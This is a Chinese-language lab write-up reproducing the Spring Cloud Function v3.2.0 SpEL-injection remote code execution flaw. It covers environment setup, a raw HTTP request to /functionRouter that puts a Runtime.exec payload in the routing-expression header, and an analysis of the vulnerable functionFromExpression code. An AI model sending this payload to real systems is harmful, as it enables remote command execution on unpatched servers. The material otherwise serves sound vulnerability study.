Spring Cloud Function 漏洞复现
一、环境搭建
https://codeload.github.com/spring-cloud/spring-cloud-function/zip/refs/tags/v3.2.0
下载当前的压缩包直接用IDEA 打开
spring-cloud-function-samples/function-sample-pojo
就可以执行运行环境
进行访问
二、修改配置文件的RCE方式
然后随意路由
三、默认配置文件下的RCE
POST /functionRouter HTTP/1.1 Host: 192.168.66.101:8080 spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc") Content-Type: application/x-www-form-urlencoded Content-Length: 5 test
四、代码分析
从Test RoutingFunctionTests.java
好像是调用apply 函数。传递了Message 类型的input
那么从这里打断点
实际上触发的代码块为:
function = this.functionFromExpression((String)message.getHeaders().get("spring.cloud.function.routing-expression"), message);
往下更进
private FunctionInvocationWrapper functionFromExpression(String routingExpression, Object input) { Expression expression = this.spelParser.parseExpression(routingExpression); String functionName = (String)expression.getValue(this.evalContext, input, String.class); Assert.hasText(functionName, "Failed to resolve function name based on routing expression '" + this.functionProperties.getRoutingExpression() + "'"); FunctionInvocationWrapper function = (FunctionInvocationWrapper)this.functionCatalog.lookup(functionName); Assert.notNull(function, "Failed to lookup function to route to based on the expression '" + this.functionProperties.getRoutingExpression() + "' whcih resolved to '" + functionName + "' function name."); if (logger.isInfoEnabled()) { logger.info("Resolved function from provided [routing-expression] " + routingExpression); } return function; }
参考:
https://mp.weixin.qq.com/s/ssHcLC72wZqzt-ei_ZoLwg
https://wx.zsxq.com/dweb2/index/topic_detail/184254458222452